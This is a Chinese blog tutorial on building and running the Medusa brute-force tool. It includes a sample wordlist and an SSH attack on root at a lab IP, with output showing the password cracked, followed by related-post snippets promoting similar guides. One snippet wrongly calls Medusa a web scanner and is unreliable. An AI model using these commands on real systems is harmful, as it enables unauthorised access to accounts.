深度揭秘暴力破解SSH密码 —— Medusa美杜莎

最新推荐文章于 2025-02-28 22:55:37 发布
最新推荐文章于 2025-02-28 22:55:37 发布
阅读量4.1k 收藏 8
点赞数 1
分类专栏: # 《Liunx》 文章标签: linux centos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yeyslspi59/article/details/109600432
版权

目录

 

前言

安装配置

模拟使用

总结

 

前言

          Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的爆力破解工具。可以同时对多个主机,用户或密码执行强力测试。Medusa和hydra一样,同样属于在线密码破解工具。Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP,PcAnywhere, POP3, PostgreSQL, rexec, RDP、rlogin, rsh, SMBNT,SMTP(AUTH/VRFY),SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC、Generic Wrapper以及Web表单的密码爆破工具。

安装配置

1)了解它的一些功能

官网:http://foofus.net/goons/jmk/medusa/medusa.html

2)去官网下载tar包

3)上传包并解压安装

[root@bogon ~]# yum install lrzsz -y
[root@bogon ~]# yum -y install gcc gcc-c++ openssl-devel libssh2-devel postgresql-devel subversion-devel freerdp-devel   #安装苏需要的依赖官网有说明
[root@bogon ~]# cd medusa-2.2
[root@bogon ~]# ./configure   --enable-debug=yes --enable-module-afp=yes --enable-module-cvs=yes --enable-module-ftp=yes --enable-module-http=yes --enable-module-imap=yes --enable-module-mssql=yes --enable-module-mysql=yes --enable-module-ncp=yes --enable-module-nntp=yes --enable-module-pcanywhere=yes --enable-module-pop3=yes --enable-module-postgres=yes --enable-module-rexec=yes --enable-module-rlogin=yes --enable-module-rsh=yes --enable-module-smbnt=yes --enable-module-smtp=yes --enable-module-smtp-vrfy=yes --enable-module-snmp=yes --enable-module-ssh=yes --enable-module-svn=yes --enable-module-telnet=yes --enable-module-vmauthd=yes --enable-module-vnc=yes --enable-module-wrapper=yes --enable-module-web-form=yes     #加入它的部分模块
[root@bogon ~]# make -j 4
[root@bogon ~]# make install   #安装
[root@bogon ~]# ls /usr/local/lib/medusa/modules    #查看可用的模块

4)美杜莎的参数说明

Medusa [-hhost|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module[OPT]
-h [TEXT]      目标主机名称或者IP地址
-H [FILE]       包含目标主机名称或者IP地址文件
-u [TEXT]      测试的用户名
-U [FILE]       包含测试的用户名文件
-p [TEXT]      测试的密码
-P [FILE]       包含测试的密码文件
-C [FILE]       组合条目文件
-O [FILE]       日志信息文件
-e [n/s/ns]    n代表空密码,s代表为密码与用户名相同
-M [TEXT]      模块执行名称
-m [TEXT]      传递参数到模块
-d                 显示所有的模块名称
-n [NUM]       使用非默认Tcp端口
-s                 启用SSL
-r [NUM]       重试间隔时间,默认为3秒
-t [NUM]       设定线程数量
-T             同时测试的主机总数
-L                 并行化,每个用户使用一个线程
-f                 在任何主机上找到第一个账号/密码后,停止破解
-F                在任何主机上找到第一个有效的用户名/密码后停止审计。
-q                显示模块的使用信息
-v [NUM]      详细级别(0-6)
-w [NUM]     错误调试级别(0-10)
-V                显示版本
-Z [TEXT]      继续扫描上一次

模拟使用

1)创建我们的字典,里面可以存放任何密码

[root@bogon ~]# vi /root/zd.txt
123456789
12345
123456ada
123456
fsfsgs

2)演示(这里我演示单一ip)

[root@bogon ~]# medusa -M ssh -h 192.168.191.129 -u root -P /root/zd.txt
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: 192.168.191.129 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456789 (1 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.191.129 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 12345 (2 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.191.129 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456ada (3 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.191.129 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (4 of 5 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.191.129 User: root Password: 123456 [SUCCESS]

总结

         可以从我的演示中看出,只要密码库够全,密码被分析出来的几率就会很大,无非就是时间的问题。

使用Medusa美杜莎暴力破解SSH密码
diexingtao9618的博客
09-19 1870
使用Medusa美杜莎暴力破解SSH密码 1、Medusa简介 Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的爆力破解工具。可以同时对多个主机,用户或密码执行强力测试。Medusa和hydra一样,同样属于在线密码破解工具。Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare...
暴力破解medusa美杜莎 hydra海德拉命令详情
期待nila
05-30 1264
本章借助nmap工具获取了模拟环境下服务端开放的高危端口,通过crunch工具生成了密码字典,通过hydar工具成功破解了服务端的,获取信息
深入探索美杜莎Medusa)工具:高效密码破解利器的使用指南
最新发布
m0_57836225的博客
02-28 925
美杜莎是一款开源的并行登录破解工具,它能够针对多种网络服务协议进行密码暴力破解。其设计初衷是为了快速、高效地检测目标系统的用户密码强度。它支持众多协议,包括但不限于 HTTP、FTP、SMB、SSH 等,这使得它在不同网络环境下都能发挥重要作用。
使用medusa进行ssh爆破
a807719447的专栏
01-26 1159
美杜莎帮助文档 -h [TEXT] : 目标ip地址 -H [FILE] : 目标ip文件 -u [TEXT] : 单个用户名 -U [FILE] : 用户名文件 -p [TEXT] : 单个密码 -P [FILE] : 密码文件 -C [FILE] : 指定格式为"user:password"的文件 -O [FILE] : 输出得日志文件 -e [n/s/ns] : n不指定密码s指定用户名等于密码,常用ns -M [
ssh暴力破解主机密码
08-09
ssh暴力破解windows服务器密码,绝对详细的教程,立即可以使用
hydra、ncrack、patator、medusa工具之ssh爆破
weixin_46561783的博客
09-22 490
hydrancrackpatatormedusa
SSH密码暴力破解及防御实战
爱是与世界平行
03-12 1802
SSH密码暴力破解及防御实战一、Hydra(海德拉)1.1 指定用户破解二、Medusa美杜莎)2.1 语法参数2.2 破解SSH密码三、Patator3.1 破解SSH密码四、BrutesPray4.1 语法参数4.2 nmap扫描4.3 字典爆破五、MSF5.1 SSH模块5.2 SSH用户枚举5.3 SSH版本探测5.4 SSH暴力破解六、暴力破解防御6.1 useradd shell [...
Linux SSH密码暴力破解技术及攻击实战
weixin_34056162的博客
11-12 3260
对于 Linux 操作系统来说,一般通过 VNC、Teamviewer 和 SSH 等工具来进行远程管理,SSH 是 Secure Shell 的缩写,由 IETF 的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。 SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SS...
暴力破解-medusa美杜莎
shenshuiwubo123的博客
06-02 9629
一、简介 medusa美杜莎)是一个速度快,支持大规模并行,模块化,爆破登陆,可以同时对多个主机,用户或是密码执行强力测试,medusa和hydra一样,同样属于在线破解工具,不同的是,medusa的稳定性相较于hydra要好很多但是支持的模块相对于hydra少一些。 二、语法参数 medusha [-h host|-H file] [-u username | -U file] [-p...
medusa (美杜莎) RDP模块
06-25
传到/usr/lib/x86_64-linux-gnu/medusa/modules目录下即可
查看本机svn账号密码
12-06
查看本机svn账号密码,双击运行即可查看,如果忘记自己的密码可以使用; 查看本机svn账号密码,双击运行即可查看,如果忘记自己的密码可以使用
美杜莎Medusa)::cat2:美杜莎Medusa)是一个红队武器库平台,目前包括扫描功能(200+个突破),XSS平台,协同平台,CVE监控等功能,持续开发中http://medusa.ascotbe.com
02-05
欢迎来到美杜莎 :backhand_index_pointing_right: 关于Medusa 该项目已获得GPL许可,可免费用于非商业用途。 项目开发人员不足。 如果您发现问题或有任何意见,请与我们联系。 bash版本线上 Web Beta版已上线 | 英文文件 :light_bulb: 文件 http://medusa.ascotbe.com :magnifying_glass_tilted_right: 错误覆盖列表 http://medusa.ascotbe.com/Documentation/#/PluginDirectory :open_book: Bash版使用说明 http://medusa.ascotbe.com/Documentation/ # /QuickStart/BashVersion :clipboard: Web版安装说明
暴力破解工具使用介绍——Medusa
qq_34853514的博客
07-29 876
这里只介绍简单的使用方法,工具是kali上已经集成的工具。 Medusa 使用语法: medusha [-h host|-H file] [-u username | -U file] [-p password | -P file] [-C file] -M modudle [OPT] 参数名 参数含义 -h 目标主机名称或是IP地址 -H 包含目标主机名称或是IP地址文件 -u 测试用户名 -U 包含测试用户名文件 -p 测试用户名密码 -P 包含测试用户名密码文件
解决公有服务器ssh 被人使用暴力破解密码的问题
ailice001的博客
06-14 5311
1:使用指定的IP进行定向登陆 vi /etc/ssh/sshd_config --添加  root限定登陆@112.112.112.112 为限定IP(公司的网段)  mylogin不限定  AllowUsers root@112.112.112.112 admin@112.112.112.112 mylogin --添加多个地址段用 , 分割 AllowUsers admin@112.1...
牛逼密码破解工具——medusa
2302_76672693的博客
10-15 2352
牛逼密码破解工具——medusa
美杜莎暴力破解ssh【服务使用有危险,望君谨慎】
xiaozhen的博客库
07-11 654
[root@localhost ~]wget https://github.com/jmk-foofus/medusa/archive/2.2.tar.gz #下载包 [root@localhost ~]tar -xzf 2.2.tar.gz [root@localhost ~]wget http://mirrors.aliyun.com/repo/epel-7.repo #下载扩展包 [root@localhost ~]mv epel-7.repo /etc/yum.repos.d/ [root@lo
了解美杜莎Medusa
weixin_30826095的博客
09-02 2959
(1).美杜莎介绍   Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的暴力破解工具。可以同时对多个主机,用户或密码执行强力测试。Medusa和hydra一样,同样属于在线密码破解工具。Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP,PcAnywhere, POP3, Postgre...
密码工具Medusa美杜莎)参数使用教程
旺仔Sec&blog
05-12 3721
Medusa是一种密码爆破工具,它支持多个协议的爆破,包括FTP、POP3、SSH、Telnet等。其主要特点是速度快,支持多线程操作。命令来查看所有可用的命令行选项和参数。除了这些常用的参数外,Medusa还支持使用配置文件进行配置,以提高攻击效率。不过在使用Medusa进行密码爆破时,请务必遵守法律法规。以上是一些常用参数,你可以使用。
kali美杜莎密码爆破
08-21
Kali Linux中的美杜莎Medusa)并不是密码爆破工具,而是一个自动化Web应用漏洞扫描器,主要用于检测网站的安全漏洞。它不是专门用于密码破解的,而是通过一系列技术如目录遍历、文件包含、SQL注入等对目标站点进行测试,帮助安全人员发现潜在的弱点。 在密码爆破方面,Linux系统中常用的工具包括John the Ripper(JTR)、Hydra等,它们可以针对特定的用户账号进行暴力破解或者字典攻击。例如,JTR支持多种哈希格式,能尝试大量的密码组合;Hydra则常用于多线程暴力破解,并支持多种协议(如SSH、FTP、HTTP)的登录凭证猜测。 如果你需要了解如何在Kali上使用这些工具进行密码恢复或验证,请告诉我,我会提供相关的教程和命令行操作指导。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

胖胖不胖、

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值